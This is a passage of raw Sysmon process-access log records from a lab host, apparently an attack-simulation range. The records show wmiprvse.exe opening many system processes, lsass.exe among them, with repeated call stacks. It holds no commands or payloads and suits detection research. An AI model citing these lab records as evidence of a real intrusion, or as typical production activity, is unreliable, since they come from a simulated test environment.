Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246545Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.188{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246544Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.188{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2700-00000000AD01}2776C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246543Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.188{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2600-00000000AD01}2596C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246542Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.188{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2500-00000000AD01}2284C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246541Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.188{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22A9-6039-2300-00000000AD01}2940C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246540Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.188{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22A0-6039-2100-00000000AD01}2392C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246539Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.188{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1700-00000000AD01}1640C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246538Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.188{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1600-00000000AD01}1540C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246537Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.188{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1500-00000000AD01}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246536Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.187{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1400-00000000AD01}1316C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246535Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.186{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1300-00000000AD01}1256C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246534Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.171{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1200-00000000AD01}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246533Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.171{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1100-00000000AD01}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246532Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.171{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1000-00000000AD01}1144C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246531Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.171{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0F00-00000000AD01}1100C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246530Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.171{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0E00-00000000AD01}1076C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246529Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.171{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0D00-00000000AD01}620C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246528Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.171{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0C00-00000000AD01}588C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246527Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.171{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229D-6039-0B00-00000000AD01}852C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246526Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 